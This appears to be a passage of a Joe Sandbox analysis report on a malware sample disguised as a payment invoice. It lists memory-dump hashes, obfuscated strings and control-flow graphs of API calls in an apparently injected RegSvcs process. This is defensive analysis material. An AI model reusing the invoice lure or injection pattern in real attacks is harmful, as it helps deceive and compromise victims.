                                                                                              • Instruction Fuzzy Hash: 90F0B47130D2168FCB349A2994669BA37AAEF84A46709007BED03C72D1DB64DF01D7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eedbeb15ca9318ac67cd6c7bf7bb59db31d2be5b7025ee617ac66489c0a4e397
                                                                                              • Instruction ID: 4ea7c8e1e8efeb8767ce05fac548cb7ea63bc06eed1cd9ddb610049006406a43
                                                                                              • Opcode Fuzzy Hash: eedbeb15ca9318ac67cd6c7bf7bb59db31d2be5b7025ee617ac66489c0a4e397
                                                                                              • Instruction Fuzzy Hash: 39F0BE713002104B8B196A2D942952D329AEFC5911B141039DD06CB390EE31CE0287D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1cecbe5e0f07638bce3b4b2903b1eb866a331d2829ad5ea12093886fad8e96b9
                                                                                              • Instruction ID: 82665136b35bc4d7670d01892dc5b25ba104cdf14e09a124571e4f52ff35cde8
                                                                                              • Opcode Fuzzy Hash: 1cecbe5e0f07638bce3b4b2903b1eb866a331d2829ad5ea12093886fad8e96b9
                                                                                              • Instruction Fuzzy Hash: 9EF0B479304345CFDB069F38E490DA93FA5EF9B35131408EAE1488F235DA35AC05CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9aab6f7f8729dd28cc431c1b8756b428fbaac761c6f00404ed19fa146c13be02
                                                                                              • Instruction ID: fd843b0a9607d08943af03156083451da6b86b91c2379268f4ce76411367e652
                                                                                              • Opcode Fuzzy Hash: 9aab6f7f8729dd28cc431c1b8756b428fbaac761c6f00404ed19fa146c13be02
                                                                                              • Instruction Fuzzy Hash: 6DF014312046908FC706DB38C5988547FF1EF0A70574649DAE08ACB332CB22EC41CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d738c3019cc6cab5762b9461fcf0f577775fbcb76d856021ab577674b4d5b06
                                                                                              • Instruction ID: 57604083272ca2f3740693156edc6d578a60f92938dbf825c874a9eed27b4c7c
                                                                                              • Opcode Fuzzy Hash: 4d738c3019cc6cab5762b9461fcf0f577775fbcb76d856021ab577674b4d5b06
                                                                                              • Instruction Fuzzy Hash: 76F082306292C48FCF069B74F9695583F30EF4A241B0515D6E8828B263DE343946C762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                              • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                              • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                              • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b1b9cd687c1107ef68552c4f536cb1231cf3f6b91f2f84d5abc17ecf91ef778
                                                                                              • Instruction ID: d9c1b0021e41097deacac035ec17fa475d75f35487561a8d22e6714fd391d2ec
                                                                                              • Opcode Fuzzy Hash: 7b1b9cd687c1107ef68552c4f536cb1231cf3f6b91f2f84d5abc17ecf91ef778
                                                                                              • Instruction Fuzzy Hash: 711295B24217458AE732CFA5E94C1893BB1B745318F92431AD2712F2E9E7B4164FEF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abc0a71b1dac977ba3a54777260664520b556be14ca98d265370237a557ebd6e
                                                                                              • Instruction ID: 5d1acfd678a80e3392abb5904116fd40a528b9600bf375cf4157eeec74e3bb1c
                                                                                              • Opcode Fuzzy Hash: abc0a71b1dac977ba3a54777260664520b556be14ca98d265370237a557ebd6e
                                                                                              • Instruction Fuzzy Hash: 6FE1E674E051198FCB14CFA9C5809AEBBF2FF89314F248169E418AB356D734AD81CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d60872443cf40d71567cfb6c262addfb153171a349a8d2eb612f8d2e08d86989
                                                                                              • Instruction ID: a7a0ca7406a33d9dc687774e17390d372240af2169d1b8e889ebf1f61da1baad
                                                                                              • Opcode Fuzzy Hash: d60872443cf40d71567cfb6c262addfb153171a349a8d2eb612f8d2e08d86989
                                                                                              • Instruction Fuzzy Hash: 70E1E974E051198FCB14CFA9C5809AEFBB2FF89305F24826AE514AB355D734AD42CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 979e5cb82a1bcef561d4b79dde6e2060fb08a48c5e3ccb03d97f3b6e661b31ca
                                                                                              • Instruction ID: 562b072b468eb43cda9388d0a61deea48effa98f382b9aeb0e2437019e80ccce
                                                                                              • Opcode Fuzzy Hash: 979e5cb82a1bcef561d4b79dde6e2060fb08a48c5e3ccb03d97f3b6e661b31ca
                                                                                              • Instruction Fuzzy Hash: 9BE1F974E051198FCB14DFA9C5809AEFBB2FF89314F2482A9E914AB355D734AD42CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a73dbf3cb2ad1439c6a49637b2a0922a0e795c750dc60c2e76ccfe7ec2ed342
                                                                                              • Instruction ID: f99bc66bb1c8b41b8b33ba4f031defc2a0afcd74c7cff9efb7d376656411176a
                                                                                              • Opcode Fuzzy Hash: 0a73dbf3cb2ad1439c6a49637b2a0922a0e795c750dc60c2e76ccfe7ec2ed342
                                                                                              • Instruction Fuzzy Hash: 2DE1C374E051198FCB14CFA9C5809AEBBF2FF89304F6481A9E458AB355D734A981CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b2e1cde7d83fcb884f14dc0d9d89794f80a731daca75f901ff24e158e5a16a4
                                                                                              • Instruction ID: db09a6f3031178f9a1b95e26599e520b9bc4e76104c4267c3ce730ee10faaae8
                                                                                              • Opcode Fuzzy Hash: 6b2e1cde7d83fcb884f14dc0d9d89794f80a731daca75f901ff24e158e5a16a4
                                                                                              • Instruction Fuzzy Hash: 41E1F874E051198FCB14CFA9C5809AEFBB2FF89314F2482A9E415AB355D734AD42CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e8e6c706671b494e41481e561eb80e84105a4822dad4cfe5d0a6f6054fb15ce
                                                                                              • Instruction ID: e4a9b5f668f2d2f4cc3cdbf1120fdbb4da204b34e2d0ec57a713043986750e4f
                                                                                              • Opcode Fuzzy Hash: 1e8e6c706671b494e41481e561eb80e84105a4822dad4cfe5d0a6f6054fb15ce
                                                                                              • Instruction Fuzzy Hash: 35E1F574E051198FCB14DFA9C5809AEBBF2FF89304F6481A9E458AB355D734AD81CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e022a5fc2c35971762233fbec8ca68c02642b99b028f82986c2a5ceee3e20842
                                                                                              • Instruction ID: 9b3388679dd75524ff3b38593193fc069854287c9eaaf36859b8c5aa8794314e
                                                                                              • Opcode Fuzzy Hash: e022a5fc2c35971762233fbec8ca68c02642b99b028f82986c2a5ceee3e20842
                                                                                              • Instruction Fuzzy Hash: 86E1E774E051198FCB14DFA9C5809AEBBF2FF89304F6481A9E414AB395D734AD81CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 878d113c6d5b2b60ec6107bff49289bd41e3eb59ed77c1f7561bdfcb2da59e58
                                                                                              • Instruction ID: fd4529b8b869ae2cf22fdb6f258c0dc9f9b9d19b09467f3073a3e91b6bcb9746
                                                                                              • Opcode Fuzzy Hash: 878d113c6d5b2b60ec6107bff49289bd41e3eb59ed77c1f7561bdfcb2da59e58
                                                                                              • Instruction Fuzzy Hash: 41A18E36E002098FCF15DFB5C84459EBFB6FF94300B1545AAE905EB265DB31E91ACB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 510b1ce9361a5c428a27d68ead74f7c57adf44b0198606e4c4b22f2f44125822
                                                                                              • Instruction ID: a2893158f24a5ea5525d1fa60eb480ed0acd2dc2796dbec83c15bc08e28494f9
                                                                                              • Opcode Fuzzy Hash: 510b1ce9361a5c428a27d68ead74f7c57adf44b0198606e4c4b22f2f44125822
                                                                                              • Instruction Fuzzy Hash: CDC119B24217458BD722CFA4E94C1893BB1BB85324F56431AD2716F2E8EBB4164FEF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b0352785eaea73a550022180317100fe75f9aa807fae21f9a5b65d01ed5bbb0
                                                                                              • Instruction ID: dc9e6baa74d8da088843979c8bf049a89fa1e9968fd2a3a7c9585df171b829b7
                                                                                              • Opcode Fuzzy Hash: 6b0352785eaea73a550022180317100fe75f9aa807fae21f9a5b65d01ed5bbb0
                                                                                              • Instruction Fuzzy Hash: ED716F74E052188FDB04DFAAC58499EFBF2BF89301F14D16AE818EB219D734A941CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40c770b411079173514dd382944ce4037644002f4f0b8dc3a22a529350f59052
                                                                                              • Instruction ID: 59227e9539a2ea12abb8c75b77491850889ed13dc213467f15bf73c4255cb5bc
                                                                                              • Opcode Fuzzy Hash: 40c770b411079173514dd382944ce4037644002f4f0b8dc3a22a529350f59052
                                                                                              • Instruction Fuzzy Hash: D8519475E016188FDB08CFAAC98459EFBF2BF89300F14C16AE819AB364DB345946CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6b02217d0769149de41378925bfb2787e8975c2b40f5af6498b0a06df820a99
                                                                                              • Instruction ID: 82314751a081d5c6cca9e2deb69254ef3c662cba8aab007b17ca6c0d08db5611
                                                                                              • Opcode Fuzzy Hash: e6b02217d0769149de41378925bfb2787e8975c2b40f5af6498b0a06df820a99
                                                                                              • Instruction Fuzzy Hash: 1851F874E052198FCB14CFA9C9809AEFBF2BF89314F2481A9D418AB356D7349D41CFA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                              • API String ID: 0-2994207708
                                                                                              • Opcode ID: 0ae918b8ead8b7b52e6fdbec6f44dcda6505f980c0971892755a127dcf431f60
                                                                                              • Instruction ID: e643cce9c99a2033fc206351bce880f68c07ea81f34483cf4792873324e54d18
                                                                                              • Opcode Fuzzy Hash: 0ae918b8ead8b7b52e6fdbec6f44dcda6505f980c0971892755a127dcf431f60
                                                                                              • Instruction Fuzzy Hash: 67121470A0121A8FCB59EFB9E86069E77B2FFA4300F51856DD015AF269DB702D49CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                              • API String ID: 0-2994207708
                                                                                              • Opcode ID: 0848cd2b0f637481e9833330899331814a0f7f393cbbb25ff29b5247fd25bf6a
                                                                                              • Instruction ID: 45ce79909cc491c9d60cbfd8a8b78baf19284044eb5d8018178cc8f1013bbfe7
                                                                                              • Opcode Fuzzy Hash: 0848cd2b0f637481e9833330899331814a0f7f393cbbb25ff29b5247fd25bf6a
                                                                                              • Instruction Fuzzy Hash: B2121370A0121A8FCB59EFB9E86069E77B2FFA4300F51856DD015AF269DB702D49CF90

Execution Graph

Execution Coverage: 1.2%
Dynamic/Decrypted Code Coverage: 5.3%
Signature Coverage: 3.8%
Total number of Nodes: 131
Total number of Limit Nodes: 7

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 557 4175c3-4175ec call 42f063 560 4175f2-417600 call 42f663 557->560 561 4175ee-4175f1 557->561 564 417610-417621 call 42db43 560->564 565 417602-41760d call 42f903 560->565 570 417623-417637 LdrLoadDll 564->570 571 41763a-41763d 564->571 565->564 570->571
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417635
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 577 42c403-42c43f call 4046a3 call 42d663 NtClose
                                                                                              APIs
                                                                                              • NtClose.NTDLL(00424814,?,00000000,?,?,00424814,?), ref: 0042C43A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 591 1022b60-1022b6c LdrInitializeThunk
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 592 1022c70-1022c7c LdrInitializeThunk
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 135 413e28-413e2a 136 413e8d-413edd call 42ef33 call 4175c3 call 404613 call 424c63 135->136 137 413e2c-413e31 135->137 151 413efd-413f03 136->151 152 413edf-413eee PostThreadMessageW 136->152 139 413e33-413e4b 137->139 140 413ddb-413de0 137->140 142 413e70-413e88 call 42e523 139->142 143 413e4e-413e67 139->143 140->135 142->136 143->142 152->151 153 413ef0-413efa 152->153 153->151
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 154 413e69-413edd call 42e523 call 42ef33 call 4175c3 call 404613 call 424c63 166 413efd-413f03 154->166 167 413edf-413eee PostThreadMessageW 154->167 167->166 168 413ef0-413efa 167->168 168->166
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 169 413e73-413e85 170 413e8d-413edd call 42ef33 call 4175c3 call 404613 call 424c63 169->170 171 413e88 call 42e523 169->171 180 413efd-413f03 170->180 181 413edf-413eee PostThreadMessageW 170->181 171->170 181->180 182 413ef0-413efa 181->182 182->180
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(56Q8T4H,00000111,00000000,00000000), ref: 00413EEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 56Q8T4H$56Q8T4H
                                                                                              • API String ID: 1836367815-3168475311

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 183 42c783-42c7c7 call 4046a3 call 42d663 RtlFreeHeap
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C7C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: tcA
                                                                                              • API String ID: 3298025750-3820114172

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 572 42c733-42c777 call 4046a3 call 42d663 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000104,?,0042481F,?,?,0042481F,?,00000104,?), ref: 0042C772
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 582 42c7d3-42c80f call 4046a3 call 42d663 ExitProcess
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,1F11715F,?,?,1F11715F), ref: 0042C80A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 587 1022c0a-1022c0f 588 1022c11-1022c18 587->588 589 1022c1f-1022c26 LdrInitializeThunk 587->589
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Strings
                                                                                              • The resource is owned shared by %d threads, xrefs: 01098E2E
                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01098DA3
                                                                                              • *** enter .cxr %p for the context, xrefs: 01098FBD
                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01098F2D
                                                                                              • *** Inpage error in %ws:%s, xrefs: 01098EC8
                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01098E4B
                                                                                              • The critical section is owned by thread %p., xrefs: 01098E69
                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01098F26
                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01098E02
                                                                                              • read from, xrefs: 01098F5D, 01098F62
                                                                                              • The instruction at %p referenced memory at %p., xrefs: 01098EE2
                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01098DC4
                                                                                              • an invalid address, %p, xrefs: 01098F7F
